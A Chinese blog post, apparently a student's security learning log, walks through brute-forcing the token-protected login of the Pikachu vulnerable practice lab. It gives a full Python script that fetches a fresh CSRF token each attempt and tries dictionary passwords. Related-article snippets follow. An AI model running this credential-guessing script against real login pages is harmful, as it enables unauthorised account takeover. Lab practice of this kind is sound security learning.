day3 poc与exp学习之pikachu带token的暴力破解

最新推荐文章于 2024-05-15 10:11:06 发布
最新推荐文章于 2024-05-15 10:11:06 发布
阅读量235 收藏
点赞数 1
文章标签: 学习 web安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68074153/article/details/125931668
版权

带token的暴力破解

每次登陆都会带上随机数token值,每次登陆都比对token值,token值不对则不进行登陆操作。

1.思路

每次发送登陆请求前先发送一个get请求获取token值,再带上获取的token值进行暴力破解。

2.cookie

这里发包的时候我们要带上cookie值,才能使用相同通道,这样保证我们上次发包请求到的token值在下次登陆时可以使用。不带上cookie值,服务器不会将这次的请求与上次的请求当作同一用户请求,那么我们先发的get请求获取的token值就没用了。cookie值可以从浏览器里查找,也可以通过插件查看。

3.exp

这里的举例没有跑用户名,就当知道用户名情况下破解。也可以在外层再套一层用户名字典循环同时跑用户名密码。

3.1 get请求获取token

先通过get请求页面,正则提取token值

url = "http://192.168.110.131/pikachu-master/vul/burteforce/bf_token.php"
        header = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
            'Cookie': 'PHPSESSID=6lipfdef22eqdok5vf00egf8og'
            #带上cookie,模拟在同一页面操作
        }
        res_get = requests.get(url, headers=header)
        token = re.findall('<input type="hidden" name="token" value="(.*?)"', res_get.text)  # 获取前端token

3.2 post请求登陆爆破

将获取到的token,以及用户名密码等参数通过post请求传递给服务器,通过正则匹配返回包判断是否找到密码。

data = {
            'username': username,
            'password': password.strip(),
            'token': token,
            'submit': 'Login'
        }
        #http主体数据
        res_post = requests.post(url=url, headers=header, data=data)
        #发送http包
        # print (res.text)
        if not re.findall('username or password is not exists', res_post.text):
            #正则匹配返回包找到正确密码
            print('密码找到了!')
            print("用户名是:", username)
            print("密码是:", password.strip())

4.完整代码

import re
import requests
username='admin'
with open('easy.txt', 'r') as passwd:
    for password in passwd:
        # 遍历字典文件匹配
        url = "http://192.168.110.131/pikachu-master/vul/burteforce/bf_token.php"
        header = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
            'Cookie': 'PHPSESSID=6lipfdef22eqdok5vf00egf8og'
            #带上cookie,模拟在同一页面操作
        }
        res_get = requests.get(url, headers=header)
        token = re.findall('<input type="hidden" name="token" value="(.*?)"', res_get.text)  # 获取前端token
        # print (token)
        data = {
            'username': username,
            'password': password.strip(),
            'token': token,
            'submit': 'Login'
        }
        #http主体数据
        res_post = requests.post(url=url, headers=header, data=data)
        #发送http包
        # print (res.text)
        if not re.findall('username or password is not exists', res_post.text):
            #正则匹配返回包找到正确密码
            print('密码找到了!')
            print("用户名是:", username)
            print("密码是:", password.strip())
SheepLeeeee
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Random实现验证码的简单示例
程序员云帆哥的博客
05-14 4742
验证码(CAPTCHA)是“Completely Automated Public Turing test to tell Computers and Humans Apart”(全自动区分计算机和人类的图灵测试)的缩写,是一种区分用户是计算机还是人的公共全自动程序。可以防止:恶意破解密码、刷票、论坛灌水,有效防止某个黑客对某一个特定注册用户用特定程序暴力破解方式进行不断的登陆尝试,
暴力破解密码--token破解
ABABC1234的博客
08-13 1831
如图render所示的即代表确实有token防爆破功能重新开始抓取登录的请求包鼠标右键把请求包发送到intruder攻击模块点击start attack开始攻击
Pikachu靶场-暴力破解~全网最最最最详细的教程!!!
最新发布
2301_77360738的博客
05-15 1104
超详细的pikachu靶场暴力破解教程,你手把手体验爆破出用户名和密码的快乐,小白可入!!!
Pikachu登录爆破之token爆破解析
黄乔国PHP
03-30 868
其实不然,有token我们依然可以爆破,关键核心点是我们在每次爆破前将token的值获取到,然后就能爆破啦!和狙击手差不多,一个参数的话都一样,只不过如果添加了两个参数的话,就一起进行爆破。那么两个参数爆破时候的值肯定就是一样的了。如果添加了两个参数的话,就会挨着来,第一个参数开始爆破时,第二个不变,如此这样,会进行500+500此 总共1000次爆破。顾名思义,就是一个一个的来,就跟98K一样,一ju一个准。添加了一个参数的话,并且假设payload有500个的话,那就执行500次,
Pikachu漏洞练习平台之暴力破解(基于burpsuite)
Welcome To Myon'Blog !
12-17 1455
Burte Force(暴力破解)概述“暴力破解”是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。为了提高效率,暴力破解一般会使用有字典的工具来进行自动化操作。理论上来说,大多数系统都是可以被暴力破解的,只要攻击者有足够强大的计算能力和时间,所以断定一个系统是否存在暴力破解漏洞,其条件也不是绝对的。
Pikachu靶场之暴力破解、XSS、CSRF漏洞
Jach1n
02-01 802
Pikachu靶场之暴力破解、XSS、CSRF
Vulnerabilities:漏洞PoCExp收集; Vulnerabilities PoC & Exp collections
05-25
针对Windows的PoC很多会被杀毒软件拦截,此为正常现象,请自行斟酌是否下载,如果有有后门的exp,请通过提交issue联系我。 Windows Microsoft Windows SMB远程代码执行漏洞(永恒之蓝) Microsoft IIS 6.0 远程...
POC&EXP编写指南.rar
02-11
POC&EXP编写指南 详细讲述了POC&EXP的编写方式,很实用
CVE-2020-0796 POC EXP.zip
04-01
CVE-2020-0796的poc检测代码。 CVE-2020-0796本地exp执行代码。
POC or EXP
02-09
收集的POCEXP
2021.4.8 护网 0day漏洞 POC 与漏洞示例
04-08
亲测真实有效,如有侵权请联系CSDN管理员删除即可
Pikachu暴力破解
m0_74300881的博客
12-24 383
进行尝试试试看,发现username为admin,password为123456的可行。正则匹配到当前html页面中的value值,放进抓包的value值,然后发送。修改验证码后,发现依旧是账号密码错误,那是不是它就是不判断验证码呢?在不变且原本为正确的验证码情况下,修改账号密码提示账号或密码错误。说明在原本验证码正确的情况下,可以一直使用,不用更改它也不会报错。而修改了原本正确的验证码后在修改账号密码,发现它说验证码错误。有验证码的,题目也给了验证码绕过,发送给重发器。在正确验证码情况下,进行字典爆破。
暴力破解绕过token限制
weixin_45253622的博客
09-01 9836
在枚举用户名和密码的时候,往往会遇到很多防御措施。 比如校验token,每次都需要更新token。 这里记录一下绕过token限制的方法。 首先使用BurpSuite抓包, 发送到intruter模块,并对需要爆破的目标位置进行设置。(这里主要是为了演示绕过token限制,所以假设已知用户名为admin) 给password设置字典 user_token需要从页面中获取 步骤:options->add->选中user_token的值。 设置跟随重定向,方法如下:options->r
渗透测试之pikachu暴力破解token防爆破)
LKmnbZ's Blog
11-12 5384
1. token介绍 Token 是在服务端产生的。如果前端使用用户名/密码向服务端请求认证,服务端认证成功,那么在服务端会返回 Token 给前端。前端可以在每次请求的时候Token 证明自己的合法地位。如果这个 Token 在服务端持久化(比如存入数据库),那它就是一个永久的身份令牌。 Token 完全由应用管理,所以它可以避开同源策略 Token 可以避免 C...
拼多多加密后token破解与还原
zwh8698的博客
10-24 3327
提示:以下是本篇文章正文内容,下面案例可供参考以上就是今天要讲的内容,本文仅仅做技术研究,如果您有更好的方法可以一起研究讨论。
暴力破解-绕过token防御
weixin_45095113的博客
11-11 856
暴力破解绕过token防御
实现用户登陆认证(token
qq_41966668的博客
05-03 8384
1、JWT定义及其组成 JWT(JSON Web Token)是一个非常轻巧的规范。这个规范允许我们使用JWT在用户和服务器之间传递安全可靠的信息。 一个JWT实际上就是一个字符串,它由三部分组成,头部、载荷与签名。 载荷(Payload) 我们先将用户认证的操作描述成一个JSON对象。其中添加了一些其他的信息,帮助今后收到这个JWT的服务器理解这个JWT。 { “sub”: ...
DVWA----暴力破解(token) ---burp suite工具
Z_Grant的博客
08-31 1220
一,DVWA的暴力破解模块的高级有token认证 【php源码】 <?php if( isset( $_GET[ 'Login' ] ) ) { // Check Anti-CSRF token
pikachu token防爆破?
为之的博客
03-22 1116
看源代码知token是通过前端代码获取的,每次刷新登录页面时token会提前获取并放入网页内。 因此我们要使用暴力破解的话,需要每次都把token放入对应的值内。 用burp抓包 送到intruder中来爆破,后清空所有选定变量,设置好password和token两个变量,同时方法选择pitchfork。 pitchfork不同于sniper,pitchfork简单理解就是你设置...
1day代表刚公开的漏洞,或者公开后没有poc exp的漏洞
06-11
1day不一定代表刚公开的漏洞,或者公开后没有poc exp的漏洞。 1day通常指的是一种漏洞的利用代码(exploit)在该漏洞被公开不到24小时内出现的情况。这意味着漏洞已经被发现并被公开,但攻击者已经准备好利用该漏洞。因此,1day漏洞通常是非常危险的,需要尽快修复。 但是,一些漏洞可能已经被公开了很长时间,但由于缺乏相关的利用代码或攻击工具,因此并没有被广泛利用。这种情况下,即使漏洞已经存在很长时间,也可以被认为是1day漏洞,因为攻击者已经准备好利用该漏洞。反之,即使漏洞刚刚公开,如果没有相关的利用代码或攻击工具,它也不会被认为是1day漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值